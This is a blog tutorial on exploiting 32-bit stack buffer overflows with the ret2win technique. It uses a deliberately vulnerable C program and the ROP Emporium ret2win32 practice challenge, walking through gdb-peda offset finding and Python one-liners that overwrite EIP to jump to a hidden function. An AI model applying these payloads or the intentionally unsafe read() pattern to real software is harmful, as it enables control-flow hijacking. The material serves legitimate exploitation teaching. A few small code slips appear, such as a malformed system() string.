Skip to main content

Buffer Overflow: The Dark Art of Exploiting Memory

·1888 words·9 mins· loading · loading ·
Aditya Hebballe
Author
Aditya Hebballe
OSCP Certified Penetration Tester
Table of Contents

Getting Started
#

A buffer overflow occurs when a program writes more data to a buffer (a contiguous block of memory) than it can hold, leading to adjacent memory locations being overwritten.

In this blog, we will start with an introduction to stack-based buffer overflows and explore a technique called ret2win

Now for example, this is a secure program that we can’t break:

#include <stdio.h>
#include <unistd.h>

int secure(){
	char buffer[200];
	int input;
	input = read(0, buffer, 200); //matches the buffer size
	printf("\n[+] user supplies: %d-bytes!", input);
	printf("\n[+] buffer content --> %s!", buffer);
	return 0;
}
int main(int argc, char * argv[]){
	secure();
	return 0;
}
gcc -m32 secure.c -o notvulnerable

It doesn’t matter how many characters we pass, only 200 bytes are read. This is because the read function takes only 200 bytes as input.

Now this is an example program susceptible to buffer overflow:

#include <stdio.h>
#include <unistd.h>

int overflow(){
	char buffer[200];
	int input;
	input = read(0, buffer, 400); //doesn't match the buffer size
	printf("\n[+] user supplies: %d-bytes!", input);
	printf("\n[+] buffer content --> %s!", buffer);
	return 0;
}
int main(int argc, char * argv[]){
	overflow();
	return 0;
}

}

Let’s compile it in 32 bit for simplicity and without buffer-overflow protection for demonstration purposes:

gcc -m32 -fno-stack-protector -no-pie -o vulnerable Overflow.c

Here’s what each flag does:

  • -m32: Compile the code for a 32-bit architecture.
  • -fno-stack-protector: Disable stack protection mechanisms that help prevent buffer overflows.
  • -no-pie: Compile the code without Position Independent Executable (PIE) support, meaning the code’s memory addresses will be fixed.

Now we can see in gdb, it should not be stripped to see the function names easily. Stripping removes symbol tables which includes function names and variable names, this is usually done for production binaries but developers keep an unstripped binary for debugging purposes.

As you can see a stripped binary cannot be disassembled by GDB as easily (ofcourse it can be done though)
To check file properties:

file vulnerable

As we can see it’s a 32-bit binary

Understanding the Basics
#

We will use gdb-peda, install it from here

Let’s start gdb with our vulnerable binary and list the functions:

gdb -q ./vulnerable
info functions

We can see all the functions in the binary.

Let’s try disassembling main function as an example:

disas main

Let’s breakdown what we see, there are the memory addresses and ofcourse the registers and instructions.

Registers are small storage locations in the CPU that hold data, addresses, or control information for quick access during execution. Instructions are commands that the CPU executes, specifying operations to perform on data stored in registers or memory. Don’t confuse between Instructions and Registers, here are a few examples

  • Registers
    • EIP: Points to the next instruction.
    • ESP: Points to the top of the stack.
    • EBP: Points to the base of the current stack frame.
  • Instructions
    • ret: Returns control to the calling function.
    • call: Calls a function, saving the return address.
    • jmp: Unconditionally jumps to a specified address

EIP or the Instruction pointer holds the address of what’s about to be executed. When we perform BOF, return address is overwritten which means the program can’t return to itself to finish what it started. If the return address is altered, when the function attempts to return (using the ret instruction), it will jump to the new address instead of the intended one.

The call instruction places the return address at the top of the stack.

The return address is placed on the stack when a function is called, waiting to be used for restoring the execution flow. When the function completes and executes the ret instruction, it takes the value from the top of the stack (pointed to by the ESP register) and loads it into the EIP register. This action restores the execution flow to the original program, allowing it to resume from where the function was called. Thus, the function successfully exits and control returns to the calling code.

It’s alright if you didn’t understand all that, once we get going you will slowly get all this into your brain.

Exploiting
#

This is the general outline we will follow (This is assuming that there are no defence mechanisms in place.)

  1. Segfault/Crash : Crash or overflow the program
  2. Eip-offset: Find out how many bytes it took to crash the programn
  3. Eip-overwrite: Confirm the offset with the legendary “B test”
  4. Shellcode/ret2-based attacks: Shellcode if NX/DEP absent or use ret2* if it is present
  5. Pwned: <insert happy hacker noises>

Now that I’ve explained the basics think what would happen if we overflow the buffer just enough to get to the EIP and pass in our own malicious address. That’s right! We can execute whatever we want then.

Now let’s go through the steps.

Crashing
#

Now let’s try to crash the program. Let’s use an obscenely large number of characters:

python -c 'print("A"*500)' | ./vulnerable

Yup it crashed. Onto the next step!

Eip-offset
#

How many bytes does it take to crash it? There are two techniques to find out

  1. Increase number of bytes until it crashes
  2. Better approach is to create a pattern and find out which part of the pattern is in the EIP to get the offset

To detect overflow into EIP we will use cyclical patterns.We can use inbuilt pattern command in gdb-peda.

pattern create 600

Beautiful!

Now for our vulnerable program we know we need 400 bytes (only because we have the source code):

pattern create 400 pattern.txt

Now let’s pass in the pattern into the program, we set a signal to break upon segmentation error:

gdb ./vulnerable
catch signal SIGSEGV
r < pattern.txt

We see what’s in the EIP so now we can check the offset:

pattern offset 0x4325416e

The offset is at 216 bytes.

Eip-overwrite
#

We need to check if we can write into the EIP so basically this is what we are going to do:

So now that we found that the offset is 216 let’s pass in 216 A’s and 4 B’s (4 B’s because the address is 4 bytes (32 bits))

python -c 'print("A"*216 + "BBBB")' > EIP_offset.txt

We can see if we get the hex for B.

gdb -q ./vulnerable
catch signal SIGSEGV
r < EIP_offset.txt

We can see that BBBB is in EIP:

Yeah we do!

Shellcode/ret2*-based attacks
#

To check security measures:

pwn checksec ./vulnerable

We can’t use shellcode attack here because the stack is not executable due to the NX bit:

The NX (No-eXecute) bit is a security feature used in modern processors to prevent certain areas of memory from being executed as code
We will use ret2 based attacks, for this we need a function that we can leverage inside the binary. So let’s create one (you obviously can’t do this with binaries for which you don’t have the source code so use an already existing function).

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int hackme()
{
	system("touch hacked.txt && -la");
}
int overflow(){
    char buffer[200];
    int input;
    input = read(0, buffer, 400); //doesn't match the buffer size
    printf("\n[+] user supplies: %d-bytes!", input);
    printf("\n[+] buffer content --> %s!", buffer);
    return 0;
}

int main(int argc, char * argv[]){
    overflow();
    return 0;
}

In this program, the hackme function is never called under normal circumstances, which means it cannot be executed. However, by exploiting BOF in the binary, we can “hack” it and force the execution of the hackme function. This demonstrates how we can manipulate the program’s control flow to run code that is otherwise inaccessible.

Now we can find the address for the hackme function:

gdb -q ./vulnerable
info functions

We have the address for the hackme function. We can alse get it by using:

p hackme

0x8049186 is not a 32 bit address and that’s because the 0 at the beginning get’s cut off.

Disassembling hackme function:

disas hackme

There is a call to a system function and above it is push. When you see a function call with an address being pushed above it, the address is likely an argument for the function (system() in this case).

The address 0x8049060 points to the Procedure Linkage Table (PLT) entry for the system function here.

Examining the address being pushed:

As previously stated this is the arguments for the system() function

Note! Since we are using 32-bit binary we should keep in mind about endianness.
Endianness refers to the order in which bytes are arranged within larger data types (like integers) in computer memory. There are 2 types Big-endian & Little-endian*
Example:

  • Big Endian: evil_function = 0xdeadbeef
  • Little Endian: evil_function = 0xefbeadde

This is going to be in little-endian as it is for the x86 architecture . Basically we need to use addresses in reverse order or least significant byte first.

Pwned
#

We need a payload and it should be like payload = offset+ hackme_addr

offset: 216 bytes as we discovered hackme_addr: modifying 0x08049186 for little-endian: 0x86910408

So using python to generate a payload. Python2 is slightly easier due to how it handles hexadecimals.

python2 -c 'print("A" * 216 + "\x86\x91\x04\x08")' | ./vulnerable
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 216 + b"\x86\x91\x04\x08")' | ./vulnerable

We have executed the hackme() function. If you remember the function was never called in the main function. We have successfully hacked the program.

Capstone Exercise
#

We will solve a challenge from https://ropemporium.com/ called ret2win, we will solve the x86 version but the x86_64 version is also solved similarly.

We don’t have the source code in this case.

Unzip it and you’ll have the ret2win32 binary. Let’s check the security measures

pwn checksec ./ret2win32

We have NX enabled so we can’t use shellcode.

To print sequences of printable characters in this binary files:

strings ret2win32

Or use this for a better output:

rabin2 -z vulnerable

rabin2 is part of radare2.c

Okayyyyyyy let’s execute it:

./ret2win32

Now let’s try to overflow it:

python3 -c 'print("A"*100)' | ./ret2win32

Let’s check dmesg. We could also use GDB but this is quicker.

sudo dmesg

So 41414141 is:

echo '\x41' | xxd

It is A

So we can overflow it.

Let’s just add catch signal SIGSEGV to our config at ~/.gdbinit as it gets annoying typing it everytime:

set debuginfod enabled on
source ~/.peda/peda.py
catch signal SIGSEGV

Start gdb and let’s find the offset.

gdb -q ./ret2win32
pattern create 100 pattern.txt
r < pattern.txt

Let’s copy the address in EIP and find the offset
Now finding the offset:

pattern offset 0x41414641

So 44 is the offset.

Let’s check with the “B test”:

python3 -c 'print("A"*44 + "BBBB")' | ./ret2win32

Now check logs:

sudo dmesg

0x42424242 is BBBB so it worked.

Now we can use ret2 method as we cannot use shellcode due to NX being enabled.

We’ll find some function to return to.

We have a pwnme function.

Disassembling it:

disas pwnme

We see a lot of put functions so this might be the function outputting what we saw earlier when the program ran. Confirmed by examining the addresses being pushed:

Let’s try disassembling the ret2win function:

disas ret2win

Let’s examine the push above the system function:

x/s 0x8048813

Bingo! This is the function we are going to use.
Little-endian-ing the address and passing it in after the offset:

python2 -c 'print("A"*44 + "\x2c\x86\x04\x08")' | ./ret2win32

And there we have it, we have successfully hacked it.

Stay tuned for more content on Reverse Engineering, thank you for reading!

Related

Homelab: Attacking Splunk+Active Directory Part-2
·1079 words·6 mins· loading · loading
Introduction # In this part, we will attack the Windows 11 machine (target-pc) from our Kali machine and also use Atomic Red Team on the target-pc to simulate various attacks.
Homelab: Splunk+Active Directory
·2389 words·12 mins· loading · loading
Introduction # In the world of cyber-security, having hands-on experience is invaluable. A home lab setup offers a powerful sandbox to simulate real-world network environments and security incidents.
Project: File Integrity Monitor
·1040 words·5 mins· loading · loading
CIA Triad # Before we jump into the project let’s understand why something like a File Integrity Monitor is required, for this we will need to understand the CIA triad.